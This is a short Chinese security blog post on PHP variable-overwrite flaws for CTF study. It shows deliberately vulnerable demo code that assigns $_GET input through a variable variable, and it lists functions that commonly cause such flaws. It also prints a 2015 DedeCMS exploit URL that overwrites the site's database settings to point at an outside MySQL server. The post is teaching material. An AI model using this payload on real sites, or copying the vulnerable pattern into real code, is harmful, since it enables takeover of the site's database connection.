1. 极安网首页
  2. 网络安全技术

CTF题目:变量覆盖漏洞

CTF题目:变量覆盖漏洞-极安网

看下这段代码:

  1. <?php
  2. $a='aaa';
  3. $aaa='xxx';
  4. echo $$a; //$$a=$($a)=$(aaa)='xxx'
  5. ?>

最后回显的是xxx,讲实话,我第一次明白了这个原理后,不禁吐槽,啥?这就是世界上最好的语言???这种低级错误还能有?

我们再回到漏洞本身:

  1. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  2. <?php
  3. $a='aa';
  4. $aa='123';
  5. echo '第一次变量aa的值是'.$aa.'<br>';
  6. $$a=$_GET['name'];
  7. echo '第二次变量aa的值是'.$aa.'<br>'; //$$a=$($a)=$aa=$_GET
  8. ?>

CTF题目:变量覆盖漏洞-极安网

发现:代码审计,扫描工具扫不出

变量覆盖漏洞大多数由函数使用不当导致,经常引发变量覆盖漏洞的函数有:extract(),parse_str()和import_request_variables()

织梦dedecms的2015年一次变量覆盖:

  1. http://www.xx.com/织梦网站后台
  2. /login.php?dopost=login&validate=dcug&useri
  3. d=账号&pwd=密码& _POST[GLOBALS]
  4. [cfg_dbhost]=MYSQL外链IP&_POST[GLOBALS] [cfg_dbuser]=MYSQL的账号
  5. &_POST[GLOBALS][cfg_dbpwd]=MYSQL的密码&
  6. _POST[GLOBALS] [cfg_dbname]=自己的dedecms的数据库

变量覆盖导致重写为任意数据库配置。

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/2826.html